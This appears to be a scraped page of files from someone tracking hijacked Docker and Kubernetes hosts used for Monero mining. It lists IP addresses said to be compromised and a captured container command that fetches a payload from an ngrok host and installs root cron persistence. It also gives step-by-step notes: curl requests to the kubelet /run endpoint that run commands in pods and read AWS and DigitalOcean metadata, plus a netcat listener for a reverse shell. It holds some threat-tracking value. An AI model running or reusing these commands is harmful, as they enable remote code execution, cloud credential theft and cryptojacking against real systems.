
exposedkubernetes.txt
infected-kubernetes.md

The following is appearing in 108 Kubernetes systems that I have tracked so far.

"containers": [
    {
        "command": [
            "sh",
            "-c",
Docker-XMR.md

Hijacked Systems

All the following IPs have the Docker API exposed and have been hijacked to mine XMR.

101.132.125.134
101.251.243.178
awsranges.txt
greynoise.json
{
"updated": "2018-09-10 18:07:50",
"type": "http path",
"duration": "24 hours",
"data": [
{
"path": "/",
"position": 1
},
{
docker.json
[
{
"Id": "33bac08a2c3b6cf7190f9c82b610d03ad88d43790e6ac03ea9b5eb2956006737",
"Names": [
"/mystifying_kilby1"
],
"Image": "sha256:9d899e1f01f4d19923e8212ffa34bfbb0c21d4ee498fff0b2c2f69b9bf665265",
"ImageID": "sha256:9d899e1f01f4d19923e8212ffa34bfbb0c21d4ee498fff0b2c2f69b9bf665265",
"Command": "/bin/sh -c 'curl --retry 3 -m 60 -o /tmpbb2716/tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd \"http://4e69fa7d.ngrok.io/f/serve?l=d&r=c3cdca1d8e60925a08dc612c426a936f\";echo \"* * * * * root sh /tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd\" >/tmpbb2716/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd\" >/tmpbb2716/etc/cron.d/1m;chroot /tmpbb2716 sh -c \"cron || crond\"'",
"Created": 1534969253,
do.md

How to connect to Digital Ocean Metadata endpoint

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "cmd=busybox wget -q -O - http://169.254.169.254/metadata/v1/"

kube.md

Grabbing the namespace, pod and container name from the Kubernetes API.

{
      "metadata": {
        "name": "spinnaker-k8spray-clouddriver-566c56787c-l6mnj",
        "namespace": "k8spray",
        "uid": "e36e6e6e-8974-11e8-9663-02ceba770664",
        "creationTimestamp": null
reverseshell.md

How to get reverse shell

Set up a listener on your VPS to connect back to.

nc -lvp 4444
aws.md

How to connect to AWS Metadata endpoint

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "cmd=busybox wget -q -O - http://169.254.169.254/latest/meta-data/"